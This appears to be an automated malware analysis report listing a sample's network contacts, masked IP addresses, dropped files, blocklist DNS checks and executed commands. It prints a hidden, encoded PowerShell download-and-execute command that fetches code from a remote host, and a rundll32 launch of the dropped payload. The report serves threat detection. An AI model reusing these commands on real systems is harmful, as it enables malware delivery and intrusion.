Technical Information
- http://46.#.19.161/point.php
- <SYSTEM32>\wermgr.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\pgsv.bin
- '46.#.19.161':80
- '91.##4.254.152':80
- '18#.#4.99.214':443
- 'ap#.#pify.org':80
- '18#.#4.99.214':443
- DNS ASK ap#.#pify.org
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK 19#.###.###.95.b.barracudacentral.org
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8ANAA2...
- '<SYSTEM32>\rundll32.exe' %TEMP%\PGsv.bin StartW
- '<SYSTEM32>\wermgr.exe'